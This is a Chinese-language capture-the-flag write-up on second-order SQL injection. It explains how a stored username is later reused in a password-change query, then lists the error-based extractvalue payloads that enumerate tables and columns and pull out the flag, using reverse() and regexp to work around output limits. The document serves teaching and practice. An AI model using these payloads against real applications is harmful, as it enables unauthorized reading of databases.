二次注入原理
是一种比较隐蔽的 SQL 注入类型
用户输入的数据先被存储到数据库中(此时可能未被恶意利用),后续应用程序从数据库中读取该数据并再次使用在 SQL 查询中,而此时就可能导致 SQL 注入问题。
如,用户注册时输入用户名 admin'-- ,这个数据被存储到数据库。之后,在修改密码等操作中,系统从数据库读取这个用户名并构建 SQL 语句,如 SELECT * FROM users WHERE username = '$username' ,这时就会引发注入。
进入题目页面,有登录、注册两个选择
先进入注册页面,尝试admin但是显示用户已存在
故随便输一个用户名密码邮箱
注册后进入登录页面,登陆后点击用户名可以看到change password
可以改密码,猜测是二次注入
在源码中发现应该是报错注入
利用字典爆破关键字看哪些被过滤了
extractvalue函数关键字未被注释,进行报错注入
爆出表名
1"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),0x7e))#
爆出flag表的字段
1"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag')))#
爆出flag字段的内容
1"||extractvalue(1,concat(0x7e,(select(flag)from(flag))))#
居然有诈qyq
试一试另一个表users
1"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users')))#
发现here只显示her,未全部显示,因为 extractvalue函数最多显示32位,故使用 reverse()函数,将回显结果倒置
1"||extractvalue(1,concat(0x7e,reverse((select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'))))#
爆出内容flag
采用正则注入
admin"||extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f'))))#
逆向输出
1"||extractvalue(1,concat(0x7e,reverse((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')))))#
组合得到flag:flag{4acbc4b8-4f30-40ea-a840-98ac491a8b02}